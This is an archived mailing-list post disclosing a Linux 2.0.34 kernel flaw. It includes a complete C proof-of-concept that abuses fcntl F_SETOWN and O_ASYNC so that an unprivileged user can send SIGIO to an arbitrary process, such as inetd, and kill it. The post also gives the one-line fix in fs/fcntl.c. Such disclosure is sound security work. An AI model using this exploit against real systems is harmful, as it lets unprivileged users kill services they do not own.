I just saw this mentioned on linux-kernel and confirmed it; #include <fcntl.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char *argv[]) { int s, p; if(argc != 2) { fputs("Please specify a pid to send signal to.\n", stderr); exit(0); } else { p = atoi(argv[1]); } fcntl(0,F_SETOWN,p); s = fcntl(0,F_GETFL,0); fcntl(0,F_SETFL,s|O_ASYNC); printf("Sending SIGIO - press enter.\n"); getchar(); fcntl(0,F_SETFL,s&~O_ASYNC); printf("SIGIO send attempted.\n"); return 0; } This can kill from a normal user account the inetd process under Linux 2.0.34 by sending a SIGIO. Very bad. The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number is approximately 139. David.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:00:56 PDT